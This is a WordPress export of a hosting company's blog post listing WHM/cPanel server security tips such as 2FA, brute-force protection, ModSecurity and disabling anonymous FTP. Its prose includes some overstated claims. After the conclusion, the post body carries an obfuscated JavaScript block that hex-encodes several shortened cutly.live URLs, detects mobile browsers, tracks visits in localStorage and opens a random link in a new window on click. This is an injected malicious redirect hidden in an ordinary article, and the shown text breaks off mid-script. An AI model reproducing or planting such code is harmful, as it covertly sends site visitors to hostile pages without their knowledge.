{"id":4148,"date":"2019-01-05T09:47:01","date_gmt":"2019-01-05T09:47:01","guid":{"rendered":"https:\/\/www.cloudhostworld.com\/blog\/?p=4148"},"modified":"2024-03-30T11:18:24","modified_gmt":"2024-03-30T11:18:24","slug":"whm-security-tips-secure-server","status":"publish","type":"post","link":"https:\/\/www.cloudhostworld.com\/blog\/whm-security-tips-secure-server\/","title":{"rendered":"Get Smart With WHM Security Tips for a Safer Server In 2021"},"content":{"rendered":"\n<p><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"800\" height=\"410\" src=\"https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2019\/01\/Get-Smart-With-WHM-Security-Tips-For-A-Safer-Server-In-2021.png\" alt=\"Get-Smart-With-WHM-Security-Tips-For-A-Safer-Server-In-2021\" class=\"wp-image-6326\" title=\"\" srcset=\"https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2019\/01\/Get-Smart-With-WHM-Security-Tips-For-A-Safer-Server-In-2021.png 800w, https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2019\/01\/Get-Smart-With-WHM-Security-Tips-For-A-Safer-Server-In-2021-300x154.png 300w, https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2019\/01\/Get-Smart-With-WHM-Security-Tips-For-A-Safer-Server-In-2021-768x394.png 768w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><\/figure>\n\n\n<p>Enhancing the security of your server is a crucial task, but it isn&#8217;t next to impossible, it can be done whilst tweaking some features of the WHM or the <em><strong>Web Host Manager<\/strong><\/em>.<\/p>\n<p>The Web Host Manager is one of the most popular server and user management consoles or interfaces in use for the server industry. It has been the preferred choice for web hosting companies and millions of users across the globe to manage their servers and set up client accounts.<\/p>\n<p>This platform has the best security tools to protect your server from vulnerabilities in the network. In this article, you&#8217;ll learn about the most efficient hacks or tweaks in the Web Host Manager or <em><strong>WHM<\/strong> <\/em>to keep your server secure.<\/p>\n<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_82_2 counter-hierarchy ez-toc-counter ez-toc-grey ez-toc-container-direction\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">Table of Contents<\/p>\n<label for=\"ez-toc-cssicon-toggle-item-69e1c964ce12c\" class=\"ez-toc-cssicon-toggle-label\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #999;color:#999\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #999;color:#999\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/label><input type=\"checkbox\"  id=\"ez-toc-cssicon-toggle-item-69e1c964ce12c\"  aria-label=\"Toggle\" \/><nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/www.cloudhostworld.com\/blog\/whm-security-tips-secure-server\/#_Use_strong_password_combinations_and_update_your_passwords_regularly\" >\u00a0Use strong password combinations and update your passwords regularly<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/www.cloudhostworld.com\/blog\/whm-security-tips-secure-server\/#_Keep_your_software_up-to-date\" >\u00a0Keep your software up-to-date<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"https:\/\/www.cloudhostworld.com\/blog\/whm-security-tips-secure-server\/#Enable_Brute-Force_Protection_in_your_WHM\" >Enable Brute-Force Protection in your WHM<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"https:\/\/www.cloudhostworld.com\/blog\/whm-security-tips-secure-server\/#BitNinja_Server_Security\" >BitNinja Server Security<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-5\" href=\"https:\/\/www.cloudhostworld.com\/blog\/whm-security-tips-secure-server\/#Cloud_Linux\" >Cloud Linux<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-6\" href=\"https:\/\/www.cloudhostworld.com\/blog\/whm-security-tips-secure-server\/#Strengthens_Server_Security\" >Strengthens Server Security<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-7\" href=\"https:\/\/www.cloudhostworld.com\/blog\/whm-security-tips-secure-server\/#Two-Factor_Authentication_2FA\" >Two-Factor Authentication (2FA)<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-8\" href=\"https:\/\/www.cloudhostworld.com\/blog\/whm-security-tips-secure-server\/#Disable_FTP_access_by_anonymous_users\" >Disable FTP access by anonymous users<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-9\" href=\"https:\/\/www.cloudhostworld.com\/blog\/whm-security-tips-secure-server\/#Install_plugins_for_cPanel_Security_through_WHM\" >Install plugins for cPanel Security through WHM\u00a0<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-10\" href=\"https:\/\/www.cloudhostworld.com\/blog\/whm-security-tips-secure-server\/#_Secure_your_Apache_and_PHP_files\" >\u00a0Secure your Apache and PHP files<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-11\" href=\"https:\/\/www.cloudhostworld.com\/blog\/whm-security-tips-secure-server\/#Disable_Shell_Access\" >Disable Shell Access\u00a0<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-12\" href=\"https:\/\/www.cloudhostworld.com\/blog\/whm-security-tips-secure-server\/#Install_ModSecurity\" >Install ModSecurity\u00a0<\/a><\/li><\/ul><\/nav><\/div>\n<h2 id=\"use-strong-password-combinations-and-update-your-passwords-regularly\"><span class=\"ez-toc-section\" id=\"_Use_strong_password_combinations_and_update_your_passwords_regularly\"><\/span><strong>\u00a0<\/strong><strong>Use strong password combinations and update your passwords regularly<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>\u00a0<\/p>\n<p>The importance of using strong password combinations provides web hosts and users with extra security for server access.\u00a0 It is advised by server and security experts to adopt strong passwords using a combination of alphabets, numbers, and special characters to keep their servers safe from security vulnerabilities.<\/p>\n<p>Keep your passwords longer so that it becomes practically impossible for hackers to gain unauthorized access. If a <em><strong>WHM<\/strong><\/em> interface shows the message as weak for your password then there is a 100% chance of your account getting hacked.<\/p>\n<p>It is absolutely imperative to change your root password and MySQL root password at least twice a month, and more so use different passwords for your web hosting account, web logins, and <em><strong>FTP accounts<\/strong><\/em>.<\/p>\n<h2 id=\"keep-your-software-up-to-date\"><span class=\"ez-toc-section\" id=\"_Keep_your_software_up-to-date\"><\/span><strong>\u00a0<\/strong><strong>Keep your software up-to-date<br \/><\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>\u00a0<\/p>\n<p>Keeping your software up-to-date is winning half the battle. The server configuration tab contains User Preferences wherein elements of the<em><strong> WHM<\/strong><\/em> like the OS, cPanel, and Spam Assassin can be updated.<\/p>\n<p>It is best advisable to set your settings to automatic and set the release tier to Release so that all the updates are patched automatically.<\/p>\n<p>For a software update like Easy Apache, it is always advisable to update it manually and when required as it could cause application malfunctions for specific PHP versions. The updates for the database are not automatic as well, they have to be patched manually as well.<\/p>\n<p>\u00a0<\/p>\n<p><a href=\"https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2019\/01\/change-an-account-package-whm.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-6453\" src=\"https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2019\/01\/change-an-account-package-whm.jpg\" alt=\"change-an-account-package-whm\" width=\"1024\" height=\"536\" title=\"\" srcset=\"https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2019\/01\/change-an-account-package-whm.jpg 1024w, https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2019\/01\/change-an-account-package-whm-300x157.jpg 300w, https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2019\/01\/change-an-account-package-whm-768x402.jpg 768w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/a><\/p>\n<p>\u00a0<\/p>\n<h2 id=\"enable-brute-force-protection-in-your-whm\"><span class=\"ez-toc-section\" id=\"Enable_Brute-Force_Protection_in_your_WHM\"><\/span><strong>Enable Brute-Force Protection in your WHM<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>\u00a0<\/p>\n<p>Activating Brute-Force protection ensures repeated attempts to gain unauthorized access to the server are unsuccessful. Repeated attempts from such IPs result in IP blocking. <a href=\"https:\/\/cloudhostworld.in\/blog\/cpanel-necessary-tool-to-make-managing-websites-painless\/\" rel=\"nofollow noopener\" target=\"_blank\"><strong>cPanel<\/strong> <\/a>\u00a0has the ability to block particular IP addresses, domain names, and more through IP Deny Manager.<\/p>\n<p>\u00a0<\/p>\n<h2 id=\"bitninja-server-security\"><span class=\"ez-toc-section\" id=\"BitNinja_Server_Security\"><\/span><strong>BitNinja Server Security<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>BitNinja Security makes it effortlessly easy to protect your web servers.<\/p>\n<p>BitNinja provides unbeatable security by shielding your server protection with a unified and proactive system specially designed for averting 99% of all kinds of malicious assaults.<\/p>\n<p><strong>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0BitNinja Prime Benefits:<\/strong><\/p>\n<ul>\n<li>A superior firewall \/ WAF, mod protection<\/li>\n<li>Intrusion Detection &amp; Intrusion Prevention System<\/li>\n<li>Real-time virus and malware scanning and elimination<\/li>\n<li>Automated malware signature validation method<\/li>\n<li>Automatic mitigation of malicious sources<\/li>\n<\/ul>\n<p><strong>BitNinja Security prevents the latest assault attacks, which includes:\u00a0<\/strong><\/p>\n<ul>\n<li>Brute-force attack at each network and HTTP levels;<\/li>\n<li>Vulnerability exploitation- CMS(WP\/Drupal\/Joomla)<\/li>\n<li>Remote Code Execution\/ SQL injection<\/li>\n<li>DoS (denial of service) detection<\/li>\n<li>Port and web application scanning<\/li>\n<\/ul>\n<p>\u00a0<\/p>\n<h2 id=\"cloud-linux\"><span class=\"ez-toc-section\" id=\"Cloud_Linux\"><\/span><strong>Cloud Linux<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>CloudLinux OS is an incredible platform to boost your server security, productivity, and steadiness by separating each user in its own Lightweight Virtualized Environments. It is completely unique environment including its own CPU, memory, IO, IOPS, amount of processes, and rest of the limits.<\/p>\n<p>\u00a0<\/p>\n<ul>\n<li>\n<h3 id=\"strengthens-server-security\"><span class=\"ez-toc-section\" id=\"Strengthens_Server_Security\"><\/span>Strengthens Server Security<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<\/li>\n<\/ul>\n<p>In Cloudlinux, every person could be related to the particular CageFS technology. In which it encapsulates every user, prohibiting them from understanding other user\u2019s confidential data.<\/p>\n<p>The lightweight virtualized environment (LVE) plays an important role in keeping attackers away from gaining access to endangered documents or snatching the data from users on the server.<\/p>\n<p><a href=\"https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2019\/01\/Server-Security.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-6459\" src=\"https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2019\/01\/Server-Security.png\" alt=\"whm server security\" width=\"800\" height=\"2000\" title=\"\" srcset=\"https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2019\/01\/Server-Security.png 800w, https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2019\/01\/Server-Security-120x300.png 120w, https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2019\/01\/Server-Security-410x1024.png 410w, https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2019\/01\/Server-Security-768x1920.png 768w, https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2019\/01\/Server-Security-614x1536.png 614w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><\/a><\/p>\n<p>\u00a0<\/p>\n<h2 id=\"two-factor-authentication-2fa\"><span class=\"ez-toc-section\" id=\"Two-Factor_Authentication_2FA\"><\/span><strong>Two-Factor Authentication (2FA)<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Two-factor authentication (2FA) is a protection method used by WHM where clients provide distinctive authentication factors to affirm their identity. 2FA is carried out to defend the client\u2019s credentials and the resources the consumer can get access to.<\/p>\n<p>It provides <strong>an advanced layer of security<\/strong> than authentication strategies that rely on single-factor authentication (SFA), where the client provides one factor\u2014generally, like a password.<\/p>\n<p>Two-factor authentication strategies depend upon a user password as the primary factor and a second, distinctive factor &#8212; normally a security token or a biometric factor, like fingerprint or facial scan.<\/p>\n<p>Two-factor authentication has been used to implement to manage access to confidential data. <strong>WHM boosts their security by 2FA <\/strong>to safeguard their user&#8217;s credentials from being hacked by hackers who stole a password database or do phishing activities to grab consumer passwords.<\/p>\n<p>\u00a0<\/p>\n<h2 id=\"disable-ftp-access-by-anonymous-users\"><span class=\"ez-toc-section\" id=\"Disable_FTP_access_by_anonymous_users\"><\/span><strong>Disable FTP access by anonymous users <\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><strong>\u00a0<\/strong><\/p>\n<p>There can be a huge risk whilst keeping the <em><strong>FTP port<\/strong><\/em> open wherein hackers can gain unauthorized access to your server. It is advised to keep disable the Anonymous FTP option under Service Configurations.<\/p>\n<p>ALSO, READ &#8211;\u00a0 <a href=\"https:\/\/www.cloudhostworld.com\/blog\/8-core-differences-between-cpanel-and-plesk\/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\"><em><strong>CPanel Vs. Plesk: Know The 8 Core Differences<\/strong><\/em><\/a><\/p>\n<p>\u00a0<\/p>\n<h2 id=\"install-plugins-for-cpanel-security-through-whm\"><span class=\"ez-toc-section\" id=\"Install_plugins_for_cPanel_Security_through_WHM\"><\/span><strong>Install plugins for cPanel Security through WHM<\/strong><strong>\u00a0<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Installation of plugins like the Rootkit hunter or RK hunter prevents unauthorized third-party access and safeguards your system from malware. It blocks all Rootkit malware that allows root access for 3rd party servers by running a scan of your system against an existing database of Rootkit malware.<\/p>\n<p>\u00a0<\/p>\n<p><a href=\"https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2019\/01\/Untitled-design-1.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-6451\" src=\"https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2019\/01\/Untitled-design-1.png\" alt=\"WHM Secure server tips\" width=\"800\" height=\"410\" title=\"\" srcset=\"https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2019\/01\/Untitled-design-1.png 800w, https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2019\/01\/Untitled-design-1-300x154.png 300w, https:\/\/www.cloudhostworld.com\/blog\/wp-content\/uploads\/2019\/01\/Untitled-design-1-768x394.png 768w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><\/a><\/p>\n<h2 id=\"secure-your-apache-and-php-files\"><span class=\"ez-toc-section\" id=\"_Secure_your_Apache_and_PHP_files\"><\/span><strong>\u00a0<\/strong><strong>Secure your Apache and PHP files<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Users can use the Easy Apache utility to secure their <em><strong>Apache server<\/strong><\/em> and PHP scripts. This prevents or blocks any malicious scripts to open a file in the home directory through remote connections.<\/p>\n<h2 id=\"disable-shell-access\"><span class=\"ez-toc-section\" id=\"Disable_Shell_Access\"><\/span><strong>Disable Shell Access<\/strong><strong>\u00a0<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Users need to disable <strong>SSH access<\/strong> if it is not required. If a file FTP is required it can be still be done through SFTP whilst SSH is completely disabled.<\/p>\n<h2 id=\"install-modsecurity\"><span class=\"ez-toc-section\" id=\"Install_ModSecurity\"><\/span><strong>Install ModSecurity<\/strong><strong>\u00a0<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>ModSecurity is WAF that filters malicious <strong>HTTP requests<\/strong>, patch applications, and more. It helps defend your server against attacks through the OWASP rule set that can be set to OWASP ModSecurity Core Rule Set.<\/p>\n<p><strong>\u00a0ALSO READ:<a href=\"https:\/\/www.cloudhostworld.com\/blog\/hosting-the-best-dedicated-game-server\/\" target=\"_blank\" rel=\"noopener noreferrer\"><em> CHOOSING THE CORRECT DEDICATED GAME SERVER FOR HOSTING PURPOSE<\/em><\/a><\/strong><\/p>\n<p><strong>To Conclude<\/strong><\/p>\n<p>These are some of the popular tips and tricks that are used by web hosts and users to harden their servers from unauthorized hacks.<\/p>\n<p><em><strong>Get Smart With WHM Security Tips for a Safer Server In 2021<\/strong><\/em> by using the <strong>WHM<\/strong> interface and tools, users can enhance their security and stay safe from powerful hacks that might disable the server.<\/p>\n<p>\u00a0<br \/><\/p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x65\\x4a\\x58\\x32\\x63\\x392','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x51\\x58\\x49\\x33\\x63\\x373','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x62\\x7a\\x41\\x30\\x63\\x330','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x7a\\x4a\\x4e\\x37\\x63\\x377','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x71\\x70\\x73\\x36\\x63\\x376','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6b\\x68\\x65\\x38\\x63\\x378','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x41\\x61\\x56\\x35\\x63\\x355','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x62\\x79\\x71\\x31\\x63\\x361',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x72\\x69\\x69\\x34\\x63\\x334',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x73\\x64\\x57\\x39\\x63\\x309','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 